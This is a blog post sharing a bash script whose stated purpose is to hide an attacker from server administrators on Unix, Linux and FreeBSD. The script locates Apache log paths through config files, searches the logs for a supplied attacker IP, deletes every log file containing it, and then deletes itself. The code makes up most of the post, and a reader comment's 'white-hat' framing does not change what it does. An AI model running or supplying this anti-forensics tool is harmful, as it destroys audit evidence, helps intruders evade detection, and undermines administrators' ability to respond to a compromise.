31 Jan
Hidden Attack with clear log files in Unix , linux
Hey! I'm back from some university exams :D and ….
Here is a bash script for finding the paths of log files (Apache first, and soon all logs) and deleting them so that an attacker stays hidden from server admins. Not bad? Not good? Where would you use that?
First we find the path of the directory containing the wanted logs, then search it line by line for log paths, and finally look for the attacker's IP in the log files and remove each matching log file. Be happy!
Tested on Debian etch 4.0 and FreeBSD 6.*
This is RC 1. [download]: Log_f
And here is the source code in bash:
#!/usr/local/bin/bash ### coded by t4z3v4r3d ### recurse function : i m not sure who has write that .So thanks unknown man ### made for FreeBSD First .... if [ "`id -u`" != "0" ];then echo "$0 cant run as $USER Please Give me the root perms!!!!! " exit 1 fi patern=$2 fl=/tmp/f.txt fd=/tmp/find.txt length=/tmp/l-f.txt log_f=/tmp/log_f.txt log_final=/tmp/final_log.txt null=/dev/null log_path=/tmp/log_Found_.txt tm="`date | cut -d ":" -f 1`" os=$OSTYPE # you can add all paths for all os type !M$ windows IS NOT OS ....Exactly! case $os in Linux*) path=/etc/ ;; linux*) path=/etc/ ;; freebsd*) path=/usr/local/ ;; *) path=/ ;; esac rm $fl touch $fl rm $fd touch $fd rm $log_f touch $log_f rm $log_final touch $log_final rm $log_path touch $log_path clear echo "Enter attacker IP" read -e ip if [ "`find $path -name apache >> $fl`" ];then echo -e "\033[3;2f Main path Found ....\033[0;0m" else if [ "`find $path -name apache2 >> $fl`" ];then echo "Founded Apache2 Config files" fi fi recurse () { for file in $(/bin/ls $1) do fqfn=$1/$file [[ -d $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } [[ -f $fqfn ]] && recurse $fqfn [[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; } ######################################################### if [ -f $1 ];then let "f=f+1" if [ "`ls $1 | grep -F .conf`" ];then let "t=t+1" cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`" echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt let "nt=nt+${nom[$t]}" let "j=$nt+$t" fi fi ################################################################################ ### MOnitoring all acts ################################################################################ echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m" echo -e 
"\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m" echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m" echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m" ############################################################################## done ; } reader(){ cat $fl | while read line ;do if [ "`ls $line | grep .conf`" != "" ];then recurse $line fi let "l=l+1" done } reader log_path_reader(){ cat $log_path | while read line ;do if [ -f $line ];then if [ "`cat $line | grep "$ip"`" != "" ];then echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in " echo -n "Removing $line" rm $line if [ ! -f $line ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi fi else echo -e "\033[1;30mFile [\033[1;31m"$line "\033[1;39mFile Dose not exist......\033[1;30m]" fi let "l2=l2+1" done } echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m" echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m" log_path_reader echo -en "\033[1;30mRemoving $0 " rm $fl $log_path $0 if [ ! -f $0 ];then echo -e "\033[1;39m ... Done !\033[0;0m" else echo -e "\033[1;31m ...Failed!\033[1;0m" fi echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m" |
—————————————————
daphne :
Hi readers .
Thanks from mr.Amiri .
When we're talking about secrecy or hiding on a server: log files on Unix/Linux servers record everything. This script is useful for [white-hat hackers] and managers to clear major log files.